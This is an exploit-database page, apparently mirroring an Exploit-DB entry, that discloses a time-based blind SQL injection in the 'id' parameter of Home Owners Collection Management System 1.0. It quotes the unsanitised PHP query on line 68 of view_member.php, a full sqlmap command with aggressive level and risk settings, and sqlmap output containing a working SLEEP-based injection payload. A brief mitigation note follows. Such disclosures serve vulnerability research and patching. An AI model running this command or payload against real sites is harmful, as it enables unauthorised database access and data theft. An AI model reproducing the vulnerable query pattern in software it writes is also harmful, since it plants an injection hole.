header-logo
Suggest Exploit
vendor:
Home Owners Collection Management System
by:
Saud Alenazi
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Home Owners Collection Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:home_owners_collection_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: XAMPP, Windows 10
2022

Home Owners Collection Management System 1.0 – ‘id’ Blind SQL Injection

This exploit is a blind SQL injection vulnerability in the Home Owners Collection Management System 1.0. The vulnerable code is located in the file '/hocms/admin/members/view_member.php' on line 68. The vulnerable code is a query that takes the 'id' parameter from the GET request and uses it in the query without any sanitization. An attacker can use the sqlmap tool to exploit this vulnerability and gain access to the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in a SQL query.
Source

Exploit-DB raw data:

# Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection
# Date: 9/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

line 68 in file "/hocms/admin/members/view_member.php"

$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");


# Sqlmap command:

sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member